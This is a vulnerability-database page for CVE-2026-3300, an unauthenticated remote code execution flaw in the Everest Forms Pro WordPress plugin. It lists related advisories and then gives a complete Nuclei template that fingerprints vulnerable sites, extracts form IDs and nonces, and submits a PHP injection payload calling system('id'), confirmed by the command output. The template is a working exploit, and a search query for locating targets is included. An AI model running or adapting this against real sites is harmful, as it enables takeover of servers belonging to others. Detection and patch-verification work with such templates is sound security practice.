| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
| CVE-2026-3300 | 31 Mar 202601:24 | – | attackerkb | |
| CVE-2026-3300 | 31 Mar 202602:21 | – | circl | |
| WordPress plugin Everest Forms Pro 代码注入漏洞 | 31 Mar 202600:00 | – | cnnvd | |
| CVE-2026-3300 | 31 Mar 202601:24 | – | cve | |
| CVE-2026-3300 Everest Forms Pro <= 1.9.12 - Unauthenticated Remote Code Execution via Calculation Field | 31 Mar 202601:24 | – | cvelist | |
| EUVD-2026-17275 | 31 Mar 202603:31 | – | euvd | |
| Exploit for CVE-2026-3300 | 5 Jun 202614:19 | – | githubexploit | |
| CVE-2026-3300 | 31 Mar 202602:15 | – | nvd | |
| WordPress Everest Forms Pro plugin <= 1.9.12 - Unauthenticated Remote Code Execution via Calculation Field vulnerability | 31 Mar 202606:57 | – | patchstack | |
| PT-2026-29180 | 31 Mar 202600:00 | – | ptsecurity |
id: CVE-2026-3300
info:
name: Everest Forms Pro <= 1.9.12 - Unauthenticated RCE via Calculation Formula Injection
author: DhiyaneshDk
severity: critical
description: |
The Everest Forms Pro plugin for WordPress is vulnerable to Remote Code Execution via PHP Code Injection in all versions up to, and including, 1.9.12. This is due to the Calculation Addon's process_filter() function concatenating user-submitted form field values into a PHP code string without proper escaping before passing it to eval(). The sanitize_text_field() function applied to input does not escape single quotes or other PHP code context characters. This makes it possible for unauthenticated attackers to inject and execute arbitrary PHP code on the server by submitting a crafted value in any string-type form field (text, email, URL, select, radio) when a form uses the "Complex Calculation" feature.
impact: |
Unauthenticated attackers can execute arbitrary PHP code on the server, potentially leading to full system compromise.
remediation: |
Update to the latest version of Everest Forms Pro plugin.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/389c0b89-e408-4ad5-9723-a16b745771f0?source=cve
- https://plugins.trac.wordpress.org/browser/everest-forms/tags/3.4.3/includes/class-evf-form-task.php#L584
- https://everestforms.net/changelog/
- https://www.wordfence.com/blog/2026/06/attackers-actively-exploiting-critical-vulnerability-in-everest-forms-pro-plugin/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2026-3300
epss-score: 0.40992
epss-percentile: 0.98487
cwe-id: CWE-94
metadata:
max-request: 3
verified: true
product: everest-forms-pro
vendor: wpeverest
fofa-query: body="/wp-content/plugins/everest-forms-pro/"
tags: cve,cve2026,wordpress,wp-plugin,everest-forms,rce,unauth,vkev
flow: http(1) && http(2) && http(3)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/everest-forms-pro/readme.txt"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Everest Forms")'
- 'compare_versions(version, "<= 1.9.12")'
condition: and
internal: true
extractors:
- type: regex
name: version
internal: true
group: 1
regex:
- 'Stable tag:\s*([0-9.]+)'
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/pages?per_page=100"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "evf-container","data-formid")'
condition: and
internal: true
extractors:
- type: regex
name: form_id
internal: true
group: 1
regex:
- 'data-formid=(?:\\"|")([0-9]+)'
- type: regex
name: nonce
internal: true
group: 1
regex:
- 'name=(?:\\"|")_wpnonce[0-9]+(?:\\"|")\s+value=(?:\\"|")([a-f0-9]+)'
- type: regex
name: nonce_field
internal: true
group: 1
regex:
- 'name=(?:\\"|")(_wpnonce[0-9]+)(?:\\"|")\s+value='
- type: regex
name: text_field
internal: true
group: 1
regex:
- 'evf-field-text[^>]*data-field-id=(?:\\"|")(field_[A-Za-z0-9]+)'
- type: regex
name: calc_field
internal: true
group: 1
regex:
- 'evf-field-number[^>]*data-field-id=(?:\\"|")(field_[A-Za-z0-9]+)'
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=everest_forms_ajax_form_submission&everest_forms[id]={{form_id}}&everest_forms[author]=1&everest_forms[form_fields][{{text_field}}]=1'%3B+system('id')%3B+echo+'&everest_forms[form_fields][{{calc_field}}]=0&{{nonce_field}}={{nonce}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- 'uid=[0-9]+\([a-z_-]+\)'
- type: word
part: body
words:
- '"success":true'
extractors:
- type: regex
group: 0
regex:
- 'uid=[0-9]+\([a-z_-]+\)\s*gid=[0-9]+\([a-z_-]+\)'
# digest: 4a0a00473045022002e890b4d8b04cb01544288ccf7a10b8c9778cac317a234b3a6dc6b410f6cadc022100dbf0305b675a6645001eca0537d37cd958832938ac2b5349cfb146fbabacb46e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation